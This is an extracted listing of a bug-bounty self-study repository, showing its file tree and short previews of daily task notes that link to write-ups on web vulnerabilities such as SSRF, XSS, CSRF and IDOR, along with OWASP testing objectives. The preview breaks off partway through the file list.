✅ CSRF to HTML INJECTION which results in USER CREDENTIALS Stealing
https://medium.com/@armaanpathan/chain-the-vulnerabilities-and-take-your-report-impact-on-the-moon-csrf-to-html-injection-which-608fa6e74236
#infosec #learn365 #bugbounty
gitextract_nhcxwvz6/
├── README.md
└── Resources/
├── Day 01 Task.md
├── Day 02 Task.md
├── Day 03 Task.md
├── Day 04 Task.md
├── Day 05 Task.md
├── Day 06 Task.md
├── Day 07 Task.md
├── Day 08 Task.md
├── Day 09 Task.md
├── Day 10 Task.md
├── Day 100 Task.md
├── Day 101 Task.md
├── Day 102 Task.md
├── Day 103 Task.md
├── Day 104 Task.md
├── Day 105 Task.md
├── Day 106 Task.md
├── Day 107 Task.md
├── Day 108 Task.md
├── Day 109 Task.md
├── Day 11 Task.md
├── Day 110 Task.md
├── Day 111 Task.md
├── Day 112 Task.md
├── Day 113 Task.md
├── Day 114 Task.md
├── Day 115 Task.md
├── Day 116 Task.md
├── Day 117 Task.md
├── Day 118 Task.md
├── Day 119 Task.md
├── Day 12 Task.md
├── Day 120 Task.md
├── Day 121 Task.md
├── Day 122 Task.md
├── Day 123 Task.md
├── Day 124 Task.md
├── Day 125 Task.md
├── Day 126 Task.md
├── Day 127 Task.md
├── Day 128 Task.md
├── Day 129 Task.md
├── Day 13 Task.md
├── Day 130 Task.md
├── Day 131 Task.md
├── Day 132 Task.md
├── Day 133 Task.md
├── Day 134 Task.md
├── Day 135 Task.md
├── Day 136 Task.md
├── Day 137 Task.md
├── Day 138 Task.md
├── Day 139 Task.md
├── Day 14 Task.md
├── Day 140 Task.md
├── Day 141 Task.md
├── Day 142 Task.md
├── Day 143 Task.md
├── Day 144 Task.md
├── Day 145 Task.md
├── Day 15 Task.md
├── Day 16 Task.md
├── Day 17 Task.md
├── Day 18 Task.md
├── Day 19 Task.md
├── Day 20 Task.md
├── Day 21 Task.md
├── Day 22 Task.md
├── Day 23 Task.md
├── Day 24 Task.md
├── Day 25 Task.md
├── Day 26 Task.md
├── Day 27 Task.md
├── Day 28 Task.md
├── Day 29 Task.md
├── Day 30 Task.md
├── Day 31 Task.md
├── Day 32 Task.md
├── Day 33 Task.md
├── Day 34 Task.md
├── Day 35 Task.md
├── Day 36 Task.md
├── Day 37 Task.md
├── Day 38 Task.md
├── Day 39 Task.md
├── Day 40 Task.md
├── Day 41 Task.md
├── Day 42 Task.md
├── Day 43 Task.md
├── Day 44 Task.md
├── Day 45 Task.md
├── Day 46 Task.md
├── Day 47 Task.md
├── Day 48 Task.md
├── Day 49 Task.md
├── Day 50 Task.md
├── Day 51 Task.md
├── Day 52 Task.md
├── Day 53 Task.md
├── Day 54 Task.md
├── Day 55 Task.md
├── Day 56 Task.md
├── Day 57 Task.md
├── Day 58 Task.md
├── Day 59 Task.md
├── Day 60 Task.md
├── Day 61 Task.md
├── Day 62 Task.md
├── Day 63 Task.md
├── Day 64 Task.md
├── Day 65 Task.md
├── Day 66 Task.md
├── Day 67 Task.md
├── Day 68 Task.md
├── Day 69 Task.md
├── Day 70 Task.md
├── Day 71 Task.md
├── Day 72 Task.md
├── Day 73 Task.md
├── Day 74 Task.md
├── Day 75 Task.md
├── Day 76 Task.md
├── Day 77 Task.md
├── Day 78 Task.md
├── Day 79 Task.md
├── Day 80 Task.md
├── Day 81 Task.md
├── Day 82 Task.md
├── Day 83 Task.md
├── Day 84 Task.md
├── Day 85 Task.md
├── Day 86 Task.md
├── Day 87 Task.md
├── Day 88 Task.md
├── Day 89 Task.md
├── Day 90 Task.md
├── Day 91 Task.md
├── Day 92 Task.md
├── Day 93 Task.md
├── Day 94 Task.md
├── Day 95 Task.md
├── Day 96 Task.md
├── Day 97 Task.md
├── Day 98 Task.md
└── Day 99 Task.md
Condensed preview — 146 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (149K chars).
[
{
"path": "README.md",
"chars": 21940,
"preview": "\n[#Learn365](https://twitter.com/search?q=%23learn365&src=typeahead_click)\n\nThe purpose of [#Learn365](https://twitter.c"
},
{
"path": "Resources/Day 01 Task.md",
"chars": 924,
"preview": "Day 1 Task\n\nWriteup :- SSRF \n\n\nhttps://infosecwriteups.com/story-of-a-really-cool-ssrf-bug-cf88a3800efc\n\n\nhttps://medium"
},
{
"path": "Resources/Day 02 Task.md",
"chars": 1021,
"preview": "Day 2 Task\n\n\nRed Team :\n\n\nWhat is MITRE ATT&CK? MITRE ATT&CK Framework by \n\n\nhttps://youtube.com/watch?v=IsPArM8xKAM @In"
},
{
"path": "Resources/Day 03 Task.md",
"chars": 519,
"preview": "Day 3 Task\n\nSSRF Poc\n\n\nhttps://youtube.com/playlist?list=PL9VLN4DOjAsjjAZiPf_vbGp9eGufX7lKY\n\neJPT resources by \n[@grumpz"
},
{
"path": "Resources/Day 04 Task.md",
"chars": 968,
"preview": "🎯 Day 4 Task\n\n\n\n✅ Broken link Hijacking \n\nhttps://www.youtube.com/watch?v=o1RCqBiyoZ0\n\nhttps://www.youtube.com/watch?v=e"
},
{
"path": "Resources/Day 05 Task.md",
"chars": 985,
"preview": "🎯 Day 5 Task\n\n✅ Blind XSS\n\n\nhttps://infosecwriteups.com/blind-xss-for-beginners-c88e48083071\n\n\nhttps://medium.com/@newp_"
},
{
"path": "Resources/Day 06 Task.md",
"chars": 615,
"preview": "🎯 Day 6 Task\n\n\n\n✅ log4j\n\n\n\nhttps://infosecwriteups.com/facts-to-clear-about-log4j-for-bug-bounty-hunters-f58e04eb025\n\nht"
},
{
"path": "Resources/Day 07 Task.md",
"chars": 480,
"preview": "🎯 Day 7 Task\n\n✅ Password Reset Link not expiring\n\n\nhttps://shahjerry33.medium.com/password-reset-link-doesnt-expires-on-"
},
{
"path": "Resources/Day 08 Task.md",
"chars": 428,
"preview": "🎯 Day 8 Task\n\n✅ How to report DMARK ?\n\n\nhttps://medium.com/techiepedia/how-to-report-dmarc-vulnerabilities-efficiently-t"
},
{
"path": "Resources/Day 09 Task.md",
"chars": 2826,
"preview": "🎯 Day 9 Task\n\n\n✅ CSRF Video\n\n\nhttps://www.youtube.com/watch?v=iyE9UsBF64w\n\n✅ POC\n\n\nhttps://www.youtube.com/watch?v=TGJ4I"
},
{
"path": "Resources/Day 10 Task.md",
"chars": 1102,
"preview": "🎯 Day 10 Task\n\n\n✅ Clickjacking \n\n\nhttps://www.youtube.com/watch?v=Unu41TIk8CY\n\n✅ Poc\n\n\nhttps://www.youtube.com/watch?v=r"
},
{
"path": "Resources/Day 100 Task.md",
"chars": 432,
"preview": "🎯 Day 100 Task\n\n\n🥳🥳🥳 Yay Glad to Share that I am Consistently learning #infosec #bugbounty & today is my #Day100 I learn"
},
{
"path": "Resources/Day 101 Task.md",
"chars": 173,
"preview": "🎯 Day 101 Task\n\n\n✅ How I could have hacked your Uber account\n\n\nhttps://www.appsecure.security/blog/how-i-could-have-hack"
},
{
"path": "Resources/Day 102 Task.md",
"chars": 129,
"preview": "🎯 Day 102 Task\n\n\n✅ Bug Bounty Live Recon - Linked / JS Discovery!\n\n\nhttps://youtu.be/yT_IqBMwLFg\n\n\n#infosec #learn365 #b"
},
{
"path": "Resources/Day 103 Task.md",
"chars": 212,
"preview": "🎯 Day 103 Task\n\n\n\n✅ HTTP Request Smuggling on business.apple.com and Others\n\n\nhttps://medium.com/@StealthyBugs/http-requ"
},
{
"path": "Resources/Day 104 Task.md",
"chars": 245,
"preview": "🎯 Day 104 Task\n\n\n✅ SVG SSRFs and saga of bypasses\n\n\nhttps://infosecwriteups.com/svg-ssrfs-and-saga-of-bypasses-777e035a1"
},
{
"path": "Resources/Day 105 Task.md",
"chars": 274,
"preview": "🎯 Day 105 Task\n\n\n✅ How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty\n\n\nhttps://i"
},
{
"path": "Resources/Day 106 Task.md",
"chars": 222,
"preview": "🎯 Day 106 Task\n\n\n✅ XSS | HTML Injection and File Upload Bypass in HUAWEI Subdomain\n\n\nhttps://medium.com/@Bishoo97x/xss-h"
},
{
"path": "Resources/Day 107 Task.md",
"chars": 196,
"preview": "🎯 Day 107 Task\n\n\n✅ How Token Misconfiguration can lead to takeover account\n\n\nhttps://cryptograph3r.blogspot.com/2022/03/"
},
{
"path": "Resources/Day 108 Task.md",
"chars": 159,
"preview": "🎯 Day 108 Task\n\n\n✅ How to hack any Payment Gateway?\n\n\nhttps://infosecwriteups.com/how-to-hack-any-payment-gateway-1ae2f0"
},
{
"path": "Resources/Day 109 Task.md",
"chars": 172,
"preview": "🎯 Day 109 Task\n\n\n\n✅ Race Condition bypassing team limit\n\n\nhttps://arbazhussain.medium.com/race-condition-bypassing-team-"
},
{
"path": "Resources/Day 11 Task.md",
"chars": 429,
"preview": "🎯 Day 11 Task\n\n\n✅ Learn Something new in Live Bug Hunting Session \n\n\n🔁 TryHackMe Room\n\n\n➡️ Working on Linux PrivEsc\n\n\n✅ "
},
{
"path": "Resources/Day 110 Task.md",
"chars": 187,
"preview": "🎯 Day 110 Task\n\n\n\n✅ Bypass Apple Corp SSO on Apple Admin Panel\n\n\nhttps://medium.com/@StealthyBugs/bypass-apple-corp-sso-"
},
{
"path": "Resources/Day 111 Task.md",
"chars": 261,
"preview": "🎯 Day 111 Task\n\n\n\n✅ The Unusual Case of Status code- 301 Redirection to AWS Security Credentials Compromise\n\n\nhttps://lo"
},
{
"path": "Resources/Day 112 Task.md",
"chars": 154,
"preview": "🎯 Day 112 Task\n\n\n\n✅ Find security bugs while you sleep! Using nuclei templates, and more..\n\n\nhttps://youtu.be/P5asvR0h3O"
},
{
"path": "Resources/Day 113 Task.md",
"chars": 283,
"preview": "🎯 Day 113 Task\n\n\n\n✅ Getting access to disabled/hidden features with the help of Burpsuite Match and Replace settings\n\n\nh"
},
{
"path": "Resources/Day 114 Task.md",
"chars": 284,
"preview": "🎯 Day 114 Task\n\n\n✅ Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router (PSV-2022–0044)\n\n\nhttps"
},
{
"path": "Resources/Day 115 Task.md",
"chars": 209,
"preview": "🎯 Day 115 Task\n\n\n✅ How I chained two vulnerabilities to steal credit card details?\n\n\nhttps://www.codedbrain.com/how-i-ch"
},
{
"path": "Resources/Day 116 Task.md",
"chars": 177,
"preview": "🎯 Day 116 Task\n\n\n✅ How I Made The BBC Hall Of Fame 3 Times\n\n\nhttps://medium.com/@tobydavenn/how-i-made-the-bbc-hall-of-f"
},
{
"path": "Resources/Day 117 Task.md",
"chars": 190,
"preview": "🎯 Day 117 Task\n\n\n✅ Improper cookie not expiring after logged out!\n\n\nhttps://medium.com/@mujios101/improper-cookie-not-ex"
},
{
"path": "Resources/Day 118 Task.md",
"chars": 289,
"preview": "🎯 Day 118 Task\n\n\n✅ Open-Redirects\n\n\nhttps://medium.com/@souravgro25/open-redirects-a93b01f31868\n\n\n✅ What you doing wrong"
},
{
"path": "Resources/Day 119 Task.md",
"chars": 152,
"preview": "🎯 Day 119 Task\n\n\n✅ Bypassing WAF for $2222\n\n\nhttps://divyanshsharma2401.medium.com/bypassing-waf-for-2222-f99b80cfdb9b\n\n"
},
{
"path": "Resources/Day 12 Task.md",
"chars": 577,
"preview": "🎯 Day 12 Task\n\n\n➡️ Working on Bug bounty Wordlist tool inspired by [Kathan Patel](https://twitter.com/KathanP19)\n\n\n🔁 Try"
},
{
"path": "Resources/Day 120 Task.md",
"chars": 164,
"preview": "🎯 Day 120 Task\n\n\n✅ Subdomain Takeover using Mobile??\n\n\nhttps://0xshakhawat.medium.com/subdomain-takeover-using-mobile-da"
},
{
"path": "Resources/Day 121 Task.md",
"chars": 226,
"preview": "🎯 Day 121 Task\n\n\n✅ Fuzzing and credentials leakage..awesome bug hunting writeup\n\n\nhttps://medium.com/@abdalrahman.alsham"
},
{
"path": "Resources/Day 122 Task.md",
"chars": 172,
"preview": "🎯 Day 122 Task\n\n\n✅ OTP bypass with response manipulation.\n\n\nhttps://ertugrull.medium.com/otp-bypass-with-response-manipu"
},
{
"path": "Resources/Day 123 Task.md",
"chars": 105,
"preview": "🎯 Day 123 Task\n\n\n\nThere is no task Today Enjoy Eid Festival \n\n🥳😊😃\n\n\n\n#learn365 #eid2022 #eidmubarak2022 \n"
},
{
"path": "Resources/Day 124 Task.md",
"chars": 204,
"preview": "🎯 Day 124 Task\n\n\n✅ An Bug Bounty Hunter’s Guide to IDOR Vulnerabilities\n\n\nhttps://medium.com/@daniel.j.hunt/an-bug-bount"
},
{
"path": "Resources/Day 125 Task.md",
"chars": 194,
"preview": "🎯 Day 125 Task\n\n\n✅ How I got a lousyT-Shirt from the Dutch Government.\n\n\nhttps://maxva.medium.com/how-i-got-a-lousyt-shi"
},
{
"path": "Resources/Day 126 Task.md",
"chars": 127,
"preview": "🎯 Day 126 Task\n\n\n✅ Hack the HAckers\n\n\nhttps://raoshaab.medium.com/hack-the-hackers-7d4ffbc70858\n\n#infosec #learn365 #bug"
},
{
"path": "Resources/Day 127 Task.md",
"chars": 145,
"preview": "🎯 Day 127 Task\n\n\n✅ The $16,000 Dev Mistake\n\n\nhttps://medium.com/@masonhck357/the-16-000-dev-mistake-13e516e86be6\n\n\n#info"
},
{
"path": "Resources/Day 128 Task.md",
"chars": 151,
"preview": "🎯 Day 128 Task\n\n\n✅ Denial of Service through …\n\n\nhttps://medium.com/@sathvika03/denial-of-service-through-55368b323839\n\n"
},
{
"path": "Resources/Day 129 Task.md",
"chars": 270,
"preview": "🎯 Day 129 Task\n\n\n✅ How i found a vulnerability that leads to access any users’ sensitive data and got $500\n\n\nhttps://med"
},
{
"path": "Resources/Day 13 Task.md",
"chars": 656,
"preview": "🎯 Day 13 Task\n\n\n✅ Start Learning OWASP Web Application Security Testing \n\n\n4.1 Information Gathering \n\n\n✅ 4.1.1 Conduc"
},
{
"path": "Resources/Day 130 Task.md",
"chars": 107,
"preview": "🎯 Day 130 Task\n\n\n✅ ToolTime - Cloud Recon 1\n\n\nhttps://youtu.be/7hKEfF-yR1w\n\n\n#infosec #learn365 #bugbounty\n"
},
{
"path": "Resources/Day 131 Task.md",
"chars": 139,
"preview": "🎯 Day 131 Task\n\n\n✅ A Fun SSRF through a Headless Browser\n\n\nhttps://corben.io/fun-ssrf-via-headless-browser/\n\n#infosec #l"
},
{
"path": "Resources/Day 132 Task.md",
"chars": 157,
"preview": "🎯 Day 132 Task\n\n\n✅ 2FA Bypass in PickMyCareer.in\n\n\nhttps://jayateerthag.medium.com/2fa-bypass-in-pickmycareer-in-8abbde4"
},
{
"path": "Resources/Day 133 Task.md",
"chars": 180,
"preview": "🎯 Day 133 Task\n\n\n✅ Exploiting Google Maps API keys for profit\n\n\nhttps://infosecwriteups.com/exploiting-google-maps-api-k"
},
{
"path": "Resources/Day 134 Task.md",
"chars": 260,
"preview": "🎯 Day 134 Task\n\n\n✅ Creator Studio’s api endpoint is vulnerable to IDOR, exposes “p40_earnings_usd”:$$$\n\n\nhttps://medium."
},
{
"path": "Resources/Day 135 Task.md",
"chars": 169,
"preview": "🎯 Day 135 Task\n\n\n✅ I have 1% chance to hack this company\n\n\nhttps://infosecwriteups.com/i-have-1-chance-to-hack-this-comp"
},
{
"path": "Resources/Day 136 Task.md",
"chars": 180,
"preview": "🎯 Day 136 Task\n\n\n✅ HTTP Request Smuggling: Part-1 (Concepts)\n\n\nhttps://medium.com/nerd-for-tech/http-request-smuggling-p"
},
{
"path": "Resources/Day 137 Task.md",
"chars": 247,
"preview": "🎯 Day 137 Task\n\n\n✅ Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)\n\n\nhttps://infosecwriteu"
},
{
"path": "Resources/Day 138 Task.md",
"chars": 218,
"preview": "🎯 Day 138 Task\n\n\n✅ Can analyzing javascript files lead to remote code execution?\n\n\nhttps://melotover.medium.com/can-anal"
},
{
"path": "Resources/Day 139 Task.md",
"chars": 346,
"preview": "🎯 Day 139 Task\n\n\n\n✅ My New Discovery In Oracle E-Business Login Panel That Allowed To Access For All Employees Informati"
},
{
"path": "Resources/Day 14 Task.md",
"chars": 1158,
"preview": "🎯 Day 14 Task\n\n\n✅ 4.1.2 Fingerprint Web Server\n\n\n_Objective_ \n\n\nDetermine the version and type of a running web server t"
},
{
"path": "Resources/Day 140 Task.md",
"chars": 130,
"preview": "🎯 Day 140 Task\n\n\n✅ Origin IP found, WAF Cloudflare Bypass\n\n\nhttps://hackerone.com/reports/1536299\n\n\n#infosec #learn365 #"
},
{
"path": "Resources/Day 141 Task.md",
"chars": 166,
"preview": "🎯 Day 141 Task\n\n\n✅ MFA (Multi-Factor Authentication)\n\n\nhttps://akash-venky091.medium.com/mfa-multi-factor-authentication"
},
{
"path": "Resources/Day 142 Task.md",
"chars": 275,
"preview": "🎯 Day 142 Task\n\n\n✅ Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click\n\n\nhttps://"
},
{
"path": "Resources/Day 143 Task.md",
"chars": 166,
"preview": "🎯 Day 143 Task\n\n\n✅ Does ms15–034 still exist today ?\n\n\nhttps://medium.com/@ryuukhagetsu/does-ms15-034-still-exist-today-"
},
{
"path": "Resources/Day 144 Task.md",
"chars": 244,
"preview": "🎯 Day 144 Task\n\n\n✅ How I managed to take over any account visits my profile with Stored XSS\n\n\nhttps://0xmahmoudjo0.mediu"
},
{
"path": "Resources/Day 145 Task.md",
"chars": 160,
"preview": "🎯 Day 145 Task\n\n\n✅ The Bucket’s Got a Hole in it\n\n\nhttps://medium.com/@manikesh-singh/the-buckets-got-a-hole-in-it-343b6"
},
{
"path": "Resources/Day 15 Task.md",
"chars": 1145,
"preview": "🎯 Day 15 Task\n\n✅ 4.1.3 Review Webserver Metafiles for Information Leakage\n\nObjective \n1. Identify hidden or obfuscated p"
},
{
"path": "Resources/Day 16 Task.md",
"chars": 749,
"preview": "🎯 Day 16 Task\n\n\n✅ 4.1.4 Enumerate Applications on Webserver\n\n\nTest Objectives\n\n\nEnumerate the applications within scope "
},
{
"path": "Resources/Day 17 Task.md",
"chars": 1036,
"preview": "🎯 Day 17 Task\n\n\n✅ 4.1.5 Review Webpage Content for Information Leakage\n\n\nTest Objectives\n\n\n1. Review webpage comments, m"
},
{
"path": "Resources/Day 18 Task.md",
"chars": 2689,
"preview": "🎯 Day 18 Task\n\n\n✅ P1 Bugs WriteUp\n\n\nhttps://medium.com/@harrmahar/how-i-get-my-first-p1-sensitive-information-disclosure"
},
{
"path": "Resources/Day 19 Task.md",
"chars": 1099,
"preview": "🎯 Day 19 Task\n\n\n✅ Github Recon\n\n\nhttps://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2"
},
{
"path": "Resources/Day 20 Task.md",
"chars": 2118,
"preview": "🎯 Day 20 Task\n\n✅ Recon Techniques\n\n\nhttps://securib.ee/beelog/the-best-bug-bounty-recon-methodology/\n\n\nhttps://www.bugcr"
},
{
"path": "Resources/Day 21 Task.md",
"chars": 5440,
"preview": "🎯 Day 21 Task\n\n\n✅ 4.1.9 Fingerprint Web Application (Merged into 4.1.8)\n\n✅ THM Room \n\n\nhttps://tryhackme.com/room/histor"
},
{
"path": "Resources/Day 22 Task.md",
"chars": 989,
"preview": "🎯 Day 22 Task\n\n\n✅ 4.1.10 Map Application Architecture (Completed)\n\n\n✅ THM Room \n\n\nhttps://tryhackme.com/room/investigati"
},
{
"path": "Resources/Day 23 Task.md",
"chars": 7996,
"preview": "🎯 Day 23 Task\n\n\n✅ THM Room \n\n\nhttps://tryhackme.com/room/attacktivedirectory\n\n\n✅ 4.2.2 Test Application Platform Configu"
},
{
"path": "Resources/Day 24 Task.md",
"chars": 2846,
"preview": "🎯 Day 24 Task\n\n\n✅ THM Room \n\n\nhttps://tryhackme.com/room/vulnversity\n\n\n✅ 4.2.3 Test File Extensions Handling for Sensiti"
},
{
"path": "Resources/Day 25 Task.md",
"chars": 5265,
"preview": "🎯 Day 25 Task\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/principlesofsecurity\n\n\n✅ 4.2.4 Review Old Backup and Unreferenced"
},
{
"path": "Resources/Day 26 Task.md",
"chars": 3887,
"preview": "🎯 Day 26 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/linuxfundamentalspart2\n\n\n✅ 4.2.5 Enumerate Infrastructure and Ap"
},
{
"path": "Resources/Day 27 Task.md",
"chars": 6261,
"preview": "🎯 Day 27 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/activerecon\n\n\n✅ Web App Pentesting - HTTP Headers & Methods Vide"
},
{
"path": "Resources/Day 28 Task.md",
"chars": 2215,
"preview": "🎯 Day 28 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/walkinganapplication\n\n\n✅ 4.2.7 Test HTTP Strict Transport Securi"
},
{
"path": "Resources/Day 29 Task.md",
"chars": 3612,
"preview": "🎯 Day 29 Task\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/sqlinjectionlm\n\n\n✅ 4.2.8 Test RIA Cross Domain Policy\n\n\nTest Obje"
},
{
"path": "Resources/Day 30 Task.md",
"chars": 1234,
"preview": "🎯 Day 30 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/windowsfundamentals2x0x\n\n\n✅ 4.2.9 Test File Permission\n\n\nTest Ob"
},
{
"path": "Resources/Day 31 Task.md",
"chars": 2947,
"preview": "🎯 Day 31 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/burpsuitebasics\n\n\n✅ 4.2.10 Test for Subdomain Takeover\n\n\n✅ https"
},
{
"path": "Resources/Day 32 Task.md",
"chars": 4103,
"preview": "🎯 Day 32 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/burpsuiterepeater\n\n---------------------------------------------"
},
{
"path": "Resources/Day 33 Task.md",
"chars": 2810,
"preview": "🎯 Day 33 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/picklerick\n\n\n---------------------------------------------------"
},
{
"path": "Resources/Day 34 Task.md",
"chars": 3006,
"preview": "🎯 Day 34 Task\n\n\n🔃 THM Room - Linux PrivEsc\n\n\nT 11 - Privilege Escalation: NFS\n\n\nhttps://tryhackme.com/room/linprivesc\n\n\n"
},
{
"path": "Resources/Day 35 Task.md",
"chars": 2005,
"preview": "🎯 Day 35 Task\n\n✅ eJPT\n\n🔃 Networking (4)\n\n\nLink Layer Devices & Protocols - Study Guide\n\n--------------------------------"
},
{
"path": "Resources/Day 36 Task.md",
"chars": 1596,
"preview": "🎯 Day 36 Task\n\n\n✅ 4.3.3 Test Account Provisioning Process\n\n\nTest Objectives - Verify which accounts may provision other "
},
{
"path": "Resources/Day 37 Task.md",
"chars": 6503,
"preview": "🎯 Day 37 Task\n\n\n✅ 4.3.4 Testing for Account Enumeration and Guessable User Account\n\n\nTest Objectives\n\n1. Review processe"
},
{
"path": "Resources/Day 38 Task.md",
"chars": 909,
"preview": "🎯 Day 38 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/sudovulnsbypass\n\n\n✅ 4.3.5 Testing for Weak or Unenforced Usernam"
},
{
"path": "Resources/Day 39 Task.md",
"chars": 4285,
"preview": "🎯 Day 39 Task\n\n\n✅ 4.4.1 Testing for Credentials Transported over an Encrypted Channel\n\n\nTest Objectives\n\n\n1. Identify se"
},
{
"path": "Resources/Day 40 Task.md",
"chars": 2422,
"preview": "🎯 Day 40 Task\n\n\n✅ 4.4.2 Testing for Default Credentials\n\n\nTest Objectives\n\n1. Determine whether the application has any "
},
{
"path": "Resources/Day 41 Task.md",
"chars": 150,
"preview": "🎯 Day 41 Task\n\n\n\nCSRF\n\n\nhttps://medium.com/@chiragrai3666/csrf-today-techniques-mitigations-and-bypasses-continued-45879"
},
{
"path": "Resources/Day 42 Task.md",
"chars": 85,
"preview": "🎯 Day 42 Task\n\n\n✅ Open Redirect \n\n\nhttps://youtu.be/dz052doAJSE\n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 43 Task.md",
"chars": 107,
"preview": "🎯 Day 43 Task\n\n\n✅ Log4j\n\n\nhttps://youtu.be/lKPUCkPTcJA\n\n\nhttps://youtu.be/Z70B3fYQUNs\n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 44 Task.md",
"chars": 143,
"preview": "🎯 Day 44 Task\n\n\nJWT Attacking JSON Web Tokens\n\n\n✅ https://infosecwriteups.com/attacking-json-web-tokens-jwts-d1d51a1e17c"
},
{
"path": "Resources/Day 45 Task.md",
"chars": 88,
"preview": "🎯 Day 45 Task\n\n\n✅ Content Discovery\n\n\nhttps://youtu.be/fGlzDi3hwlU\n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 46 Task.md",
"chars": 168,
"preview": "🎯 Day 46 Task\n\n\n✅ Idor\n\n\nhttps://medium.com/@aysebilgegunduz/everything-you-need-to-know-about-idor-insecure-direct-obje"
},
{
"path": "Resources/Day 47 Task.md",
"chars": 139,
"preview": "🎯 Day 47 Task\n\n\n✅ Account Takeover\n\n\nhttps://medium.com/techiepedia/p5-to-p1-intresting-account-takeover-6e59b879494b\n\n\n"
},
{
"path": "Resources/Day 48 Task.md",
"chars": 156,
"preview": "🎯 Day 48 Task\n\n\n✅ RCE on a Java Web Application\n\nhttps://infosecwriteups.com/the-story-of-a-rce-on-a-java-web-applicatio"
},
{
"path": "Resources/Day 49 Task.md",
"chars": 146,
"preview": "🎯 Day 49 Task\n\n\n✅ Dependency Confusion\n\nhttps://hetroublemakr.medium.com/how-i-approached-dependency-confusion-272b46f66"
},
{
"path": "Resources/Day 50 Task.md",
"chars": 139,
"preview": "🎯 Day 50 Task\n\n\n✅ Automate Blind XSS\n\n\nhttps://securityonline.info/blind-xss-search/\n\n\nhttps://youtu.be/GcznQUsNW3s\n\n\n\n#"
},
{
"path": "Resources/Day 51 Task.md",
"chars": 198,
"preview": "🎯 Day 51 Task\n\n\n✅ Finding And Exploiting S3 Amazon Buckets For Bug Bounties\n\n\nhttps://infosecwriteups.com/finding-and-ex"
},
{
"path": "Resources/Day 52 Task.md",
"chars": 144,
"preview": "🎯 Day 52 Task\n\n\n✅ Web Cache Poisioning attack\n\n\nhttps://gupta-bless.medium.com/exploiting-web-cache-poisoning-e3a6b9df15"
},
{
"path": "Resources/Day 53 Task.md",
"chars": 168,
"preview": "🎯 Day 53 Task\n\n\n✅ Unique Case for Price Manipulation \n\n\nhttps://infosecwriteups.com/unique-case-for-price-manipulation-b"
},
{
"path": "Resources/Day 54 Task.md",
"chars": 214,
"preview": "🎯 Day 54 Task\n\n\n✅ Account takeover via the Password Reset Functionality.\n\n\nhttps://infosecwriteups.com/how-i-was-able-to"
},
{
"path": "Resources/Day 55 Task.md",
"chars": 215,
"preview": "🎯 Day 55 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/ohsint\n\n\n✅ API Token Hijacking Through Clickjacking\n\n\nhttps://in"
},
{
"path": "Resources/Day 56 Task.md",
"chars": 158,
"preview": "🎯 Day 56 Task\n\n\n✅ API Exploitation →Business Logic Bug\n\n\nhttps://medium.com/techiepedia/api-exploitation-business-logic-"
},
{
"path": "Resources/Day 57 Task.md",
"chars": 237,
"preview": "🎯 Day 57 Task\n\n\n✅ Attended [Infosec Conference](https://twitter.com/InfoSecComm) on : Android Static Analysis \n\n\nhttps:"
},
{
"path": "Resources/Day 58 Task.md",
"chars": 96,
"preview": "🎯 Day 58 Task\n\n\n✅ Finding bugs on NFT website for fun & Profit by @zseano \n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 59 Task.md",
"chars": 269,
"preview": "🎯 Day 59 Task\n\n\n✅ EXIF Geolocation Data Not Stripped From Uploaded Images\n\n\nhttps://medium.com/@souravnewatia/exif-geolo"
},
{
"path": "Resources/Day 60 Task.md",
"chars": 147,
"preview": "🎯 Day 60 Task\n\n\n✅ Thick Client Pentesting \n\n\nhttps://payatu.com/blog/farid/Thick-Client-Basic\n\n\nhttps://youtu.be/dC9M4ha"
},
{
"path": "Resources/Day 61 Task.md",
"chars": 120,
"preview": "🎯 Day 61 Task\n\n\n✅ Conduct a Penetration Test Like a Pro in 6 Phases\n\n\nhttps://youtu.be/8a1yTN2kFNw\n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 62 Task.md",
"chars": 130,
"preview": "🎯 Day 62 Task\n\n\n✅ Firewall Penetration Testing\n\n\nhttps://youtu.be/0Izu0J6iSoM\n\n\nhttps://youtu.be/ocekT9Llep0\n\n\n#infosec "
},
{
"path": "Resources/Day 63 Task.md",
"chars": 122,
"preview": "🎯 Day 63 Task\n\n\n✅ Host Discovery & Vulnerability Scanning With Nessus\n\n\nhttps://youtu.be/TA1rCRyHRsM\n\n\n#infosec #learn36"
},
{
"path": "Resources/Day 64 Task.md",
"chars": 135,
"preview": "🎯 Day 64 Task\n\n\n✅ AWS Web Application Firewall (WAF)\n\n\nhttps://youtu.be/udug43AWeJw\n\n\n✅ 5 Exercise Pentesterlabs \n\n\n#inf"
},
{
"path": "Resources/Day 65 Task.md",
"chars": 141,
"preview": "🎯 Day 65 Task\n\n\n✅ Introduction To Pentesting - Enumeration\n\n\nhttps://youtu.be/WvSEkPU1n0I\n\n\n✅ 6 Exercise Pentesterlabs \n"
},
{
"path": "Resources/Day 66 Task.md",
"chars": 280,
"preview": "🎯 Day 66 Task\n\n\n✅ Bypassing CSRF Protection\n\n\nhttps://medium.com/swlh/bypassing-csrf-protection-c9b217175ee\n\n\nhttps://me"
},
{
"path": "Resources/Day 67 Task.md",
"chars": 238,
"preview": "🎯 Day 67 Task\n\n\n✅ HTML Injection\n\n\nhttps://medium.com/@chaitanyarajhans024/simple-html-injection-to-250-895b760409ed\n\n\nh"
},
{
"path": "Resources/Day 68 Task.md",
"chars": 192,
